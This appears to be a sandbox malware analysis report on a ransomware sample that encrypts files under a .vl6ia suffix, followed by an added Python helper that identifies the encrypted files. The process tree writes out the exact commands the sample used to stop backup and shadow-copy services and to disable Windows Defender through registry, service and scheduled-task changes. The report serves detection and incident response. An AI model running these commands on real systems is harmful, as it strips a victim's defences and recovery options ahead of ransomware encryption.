Analysis
- max time kernel: 137s
- max time network: 127s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 12-01-2022 14:43
- Static task: static1
- Behavioral task: behavioral1
  Sample: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  Resource: win7-en-20211208
- Behavioral task: behavioral2
  Sample: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  Resource: win10-en-20211208
The signatures and process tree on this page are from the windows10_x64 run (behavioral2, resource win10-en-20211208), as the analysis header above states.
General
- Target: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
- Size: 3.8MB
- MD5: cc827025f0fc7997097626f534635501
- SHA1: 9434cc56f7e8b0a246dbc3a799e7850cdb87c9c5
- SHA256: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3
- SHA512: 855159b33f3fb2d859dcfd5468d1bfd5b3b2a6258c80a6bc0e1b98ca38b8e8c3161893307c0726f611dc4709c734c89931893db9b6529353257e916e589c5d8c
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the MpCmdRun utility to delete all AV definitions (MpCmdRun.exe -RemoveDefinitions -All; the report records the process but not its arguments).
  Processes: MpCmdRun.exe (PID 1904)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" (Start=4 is SERVICE_DISABLED: the Windows Defender Antivirus service will not start at the next boot)
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 424), bcdedit.exe (PID 3252)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Drops file in Program Files directory (64 IoCs)
  Every IoC is a "File opened for modification" event by 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe. Names ending in .vl6ia carry a fixed 43-character token plus a 12-character variable segment appended after the original extension; the remaining entries are still under their original names at the time of the event.
  Processes: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe, File opened for modification:
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_32x32x32.png
  - C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipRes.dll.mui
  - C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_EAAAABAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanMerge.scale-180.png
  - C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\976_24x24x32.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\sheep.png
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LAAAACwAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\ScanIcon_contrast-black.png
  - C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12c.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cy_60x42.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\az_16x11.png
  - C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-48_altform-unplated_contrast-white.png
  - C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-20.png
  - C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\AppxSignature.p7x
  - C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-96_altform-unplated_contrast-white.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-400.png
  - C:\Program Files\7-Zip\Lang\lij.txt.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_20x20x32.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailWideTile.scale-400.png
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_MAAAADAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\Images\image_placeholder.scale-125.png
  - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-200_contrast-white.png
  - C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\SurfaceProfiles\canvas12oz_512x512_nm.png
  - C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-colorize.png
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_GgAAABoAAAA0.vl6ia
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_PgAAAD4AAAA0.vl6ia
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforsignature.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_NAAAADQAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-100_contrast-black.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_scan_logo.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LgAAAC4AAAA0.vl6ia
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_CAAAAAgAAAA0.vl6ia
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\976_32x32x32.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\in_60x42.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\lr_60x42.png
  - C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-100.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSmallTile.scale-400.png
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AgAAAAIAAAA0.vl6ia
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\mask_corners_king.png
  - C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-400.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\eg_16x11.png
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia
  - C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LAAAACwAAAA0.vl6ia
  - C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri
  - C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\toast.dualsim2.scale-200.png
  - C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\DailyChallenges\tile1_diamond.png
  - C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sa_60x42.png
  - C:\Program Files\7-Zip\Lang\ta.txt.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_BAAAAAQAAAA0.vl6ia
  - C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\ResetCoord.scale-100.png
  - C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png
  - C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-150.png
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_KAAAACgAAAA0.vl6ia
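The 64 paths above split into files still under their original names and files already renamed with a fixed suffix. The helper below is an added example, not part of the Triage report and not the malware's own code: it matches the suffix layout visible on this page (original name, a dot, a 43-character URL-safe base64 token that is identical on every renamed file, an underscore, a 12-character base64 segment, and .vl6ia) and decodes the two base64 segments so an analyst can list encrypted files and their original extensions from a directory listing. The sample listing is constructed from paths copied out of the report plus one decoy; the 32-byte token and the 9-byte trailer are decoded as raw bytes only, because what they encode is not stated on this page and is not assumed here.

```python
"""
Added example, not part of the Triage report: parse the renamed-file pattern
seen in the 'Drops file in Program Files directory' IoCs and summarise which
entries of a directory listing carry it.
"""
import base64
import re
import struct
from collections import Counter

# Layout of every renamed file on the report page:
#   <original name>.<43-char URL-safe base64 marker>_<12-char base64 trailer>.vl6ia
# The marker is identical on all 64 IoCs; the trailer varies per file.
MARKER = "vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH"
NAME_RX = re.compile(
    r"^(?P<orig>.+)\.(?P<marker>[A-Za-z0-9-]{43})_(?P<trailer>[A-Za-z0-9+/]{12})\.vl6ia$"
)


def _b64url_decode(s):
    """Decode unpadded URL-safe base64 (the marker carries no '=' padding)."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def parse_encrypted_name(path):
    """Describe an encrypted file name, or return None when the name does not
    follow the suffix layout (the .vl6ia extension alone is not enough)."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    m = NAME_RX.match(name)
    if not m:
        return None
    orig = m.group("orig")
    marker = _b64url_decode(m.group("marker"))        # 43 chars -> 32 bytes
    trailer = base64.b64decode(m.group("trailer"))    # 12 chars -> 9 bytes
    # On every name in the report the 9 bytes split as two equal little-endian
    # uint32 values followed by 0x34. Their meaning is not documented on the
    # page; they are exposed only so files can be compared with each other.
    a, b, tail = struct.unpack("<IIB", trailer)
    return {
        "path": path,
        "original_name": orig,
        "original_ext": orig.rsplit(".", 1)[-1].lower() if "." in orig else "",
        "marker_matches_report": m.group("marker") == MARKER,
        "marker_len": len(marker),
        "trailer_u32": (a, b),
        "trailer_tail": tail,
    }


def scan(paths):
    """Split a listing into encrypted and untouched entries and count the
    encrypted ones by original extension."""
    parsed = [p for p in map(parse_encrypted_name, paths) if p]
    return {
        "encrypted": parsed,
        "untouched": len(paths) - len(parsed),
        "by_original_ext": Counter(p["original_ext"] for p in parsed),
    }


# Constructed listing: the first six paths are copied from the report's IoCs,
# the last is a decoy that has the extension but not the suffix layout.
SAMPLE_PATHS = [
    r"C:\Program Files\7-Zip\Lang\ta.txt.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_BAAAAAQAAAA0.vl6ia",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia",
    r"C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_NAAAADQAAAA0.vl6ia",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia",
    r"C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\AppxSignature.p7x",
    r"C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipRes.dll.mui",
    r"C:\Users\Admin\Documents\notes.vl6ia",
]

if __name__ == "__main__":
    result = scan(SAMPLE_PATHS)
    for p in result["encrypted"]:
        print(f"{p['original_name']:<40} trailer={p['trailer_u32']} tail=0x{p['trailer_tail']:02x}")
    print("untouched:", result["untouched"], "by ext:", dict(result["by_original_ext"]))
```

Run it against `dir /s /b` output from an affected volume to get a per-extension count of what was encrypted; the `marker_matches_report` flag tells you whether a file was renamed with the same token as this sample or with a different one.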
- Launches sc.exe
  sc.exe is the Windows utility for controlling services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 5056)
- Modifies registry class (3 IoCs)
  Processes: reg.exe (three instances), Key deleted:
  - \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
  - \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
  - \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
  EPP is the Windows Defender shell extension that provides the "Scan with Microsoft Defender" context-menu entry; deleting these three keys removes it for files, folders and drives.
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe (PID 640, 3 events), powershell.exe (PID 2700, 3 events), 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe (PID 3584, 2 events)
- Suspicious use of AdjustPrivilegeToken (64 IoCs; the list is capped at 64 entries and cuts off partway through the second wmic.exe pass)
  Processes:
  - wevtutil.exe (PID 2832): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 4176): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 4296): SeSecurityPrivilege, SeBackupPrivilege
  - wmic.exe (PID 4212): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the unresolved privilege LUIDs 33, 34, 35, 36
  - wmic.exe (PID 4324): the same set, enabled twice; the second pass is truncated after SeUndockPrivilege by the 64-entry cap
  SeSecurityPrivilege together with SeBackupPrivilege is the pair wevtutil enables to clear or export a log (the Security log requires SeSecurityPrivilege), so the three wevtutil.exe instances match the "Clears Windows event logs" signature above. The full privilege set on wmic.exe is what wmic enables on its own token for any query; the notable fact is that wmic ran at all, alongside the "Deletes shadow copies" signature.
- Suspicious use of WriteProcessMemory (64 IoCs; every parent/child pair appears twice in the raw list, giving 32 distinct spawns)
  Processes (parent PID -> child):
  - 3584 (4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe) -> net.exe: PIDs 3956, 4292, 4208, 4452, 4352, 4484, 3352, 3280, 644
  - net.exe -> net1.exe: 3956 -> 8, 4292 -> 4180, 4208 -> 4372, 4452 -> 4344, 4352 -> 788, 4484 -> 3748, 3352 -> 4248, 3280 -> 524, 644 -> 1020
  - 3584 (sample) -> sc.exe: PIDs 956, 1236, 1376, 1572, 1844, 2112, 2384, 2612, 2696
  - 3584 (sample) -> reg.exe: PIDs 2152, 1972, 4832, 1192, 4988
Processes
- C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe (PID 3584)
  command line: "C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"
  signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  net.exe (each flagged "Suspicious use of WriteProcessMemory" because it spawns net1.exe), stopping services:
  - C:\Windows\SYSTEM32\net.exe (PID 3956): net.exe stop "SamSs" /y
    - C:\Windows\system32\net1.exe (PID 8): C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4292): net.exe stop "SDRSVC" /y
    - C:\Windows\system32\net1.exe (PID 4180): C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4208): net.exe stop "SstpSvc" /y
    - C:\Windows\system32\net1.exe (PID 4372): C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4452): net.exe stop "UI0Detect" /y
    - C:\Windows\system32\net1.exe (PID 4344): C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4352): net.exe stop "vmicvss" /y
    - C:\Windows\system32\net1.exe (PID 788): C:\Windows\system32\net1 stop "vmicvss" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4484): net.exe stop "VSS" /y
    - C:\Windows\system32\net1.exe (PID 3748): C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\SYSTEM32\net.exe (PID 3352): net.exe stop "wbengine" /y
    - C:\Windows\system32\net1.exe (PID 4248): C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\SYSTEM32\net.exe (PID 3280): net.exe stop "WebClient" /y
    - C:\Windows\system32\net1.exe (PID 524): C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\SYSTEM32\net.exe (PID 644): net.exe stop "UnistoreSvc_13705" /y
    - C:\Windows\system32\net1.exe (PID 1020): C:\Windows\system32\net1 stop "UnistoreSvc_13705" /y
  sc.exe, disabling the same services so they do not return after a reboot:
  - C:\Windows\SYSTEM32\sc.exe (PID 956): sc.exe config "SamSs" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1236): sc.exe config "SDRSVC" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1376): sc.exe config "SstpSvc" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1572): sc.exe config "UI0Detect" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1844): sc.exe config "vmicvss" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2112): sc.exe config "VSS" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2384): sc.exe config "wbengine" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2612): sc.exe config "WebClient" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2696): sc.exe config "UnistoreSvc_13705" start= disabled
  reg.exe, disabling Windows Security Center and then rewriting Defender policy:
  - C:\Windows\SYSTEM32\reg.exe (PID 2152): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1972): reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4832): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1192): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4988): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1400): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4876): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4864): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4580): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4776): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 5028): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2880): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 5096): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 396): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  The captured tree ends here; the vssadmin.exe, bcdedit.exe, wevtutil.exe, wmic.exe, powershell.exe and MpCmdRun.exe processes referenced in the signatures above fall outside the visible portion.
Services targeted by the net stop / sc config pairs: SamSs (Security Accounts Manager), SDRSVC (Windows Backup), SstpSvc (Secure Socket Tunneling Protocol), UI0Detect (Interactive Services Detection), vmicvss (Hyper-V Volume Shadow Copy Requestor), VSS (Volume Shadow Copy), wbengine (Block Level Backup Engine), WebClient (WebDAV client), UnistoreSvc_13705 (a per-user instance of the User Data Storage service).
Registry notes: the reg delete of HKLM\Software\Policies\Microsoft\Windows Defender wipes any administrator-set Defender policy before the reg add commands recreate the key with real-time, behaviour, IOAV and on-access protection, PUA blocking, cloud reporting (SpyNet/MAPS), block-at-first-sight and sample submission all turned off; SecurityHealthService Start=4 disables the Windows Security Center service. On Windows 10/11 builds with Tamper Protection enabled, Defender does not honour most of these policy values (nor MpCmdRun -RemoveDefinitions), so responders should treat their presence as evidence of attempted tampering rather than proof that protection was off.
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:668
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2908
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4972
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:908
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2772
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1504
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1640
-
